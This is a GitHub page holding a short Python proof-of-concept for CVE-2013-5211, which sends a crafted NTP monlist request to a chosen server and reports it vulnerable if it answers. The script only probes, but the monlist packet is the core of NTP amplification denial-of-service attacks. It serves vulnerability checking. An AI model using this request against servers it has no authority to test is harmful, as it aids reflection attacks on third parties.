-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2013-5211.py
44 lines (38 loc) · 1.28 KB
/
CVE-2013-5211.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# PoC Title: Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS
# CVE Number: CVE-2013-5211
# Date: Saturday, February 4, 2023
# PoC Author: 0xhav0c
# Version: <= NTP version 4.2.7-p26
import sys
import socket
def vuln(server):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ntppacket = bytearray(48)
ntppacket[0] = 0x17
ntppacket[1] = 0x00
ntppacket[2] = 0x03
ntppacket[3] = 0x2a
server = socket.gethostbyname(server)
sock.sendto(ntppacket, (server, 123))
sock.settimeout(5)
try:
data, address = sock.recvfrom(1024)
except socket.timeout:
address = server
print("Timeout:", address)
sys.exit(0)
if data:
print("This NTP Server has CVE-2013-5211 Vulnerability:", address)
return True
else:
print("Server not vulnerable:", address)
return False
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: python3", sys.argv[0], "<server>")
sys.exit(0)
is_vulnerable = vuln(sys.argv[1])
if is_vulnerable:
print("IP Address has Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS:", sys.argv[1])
else:
print("IP Address has not Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS:", sys.argv[1])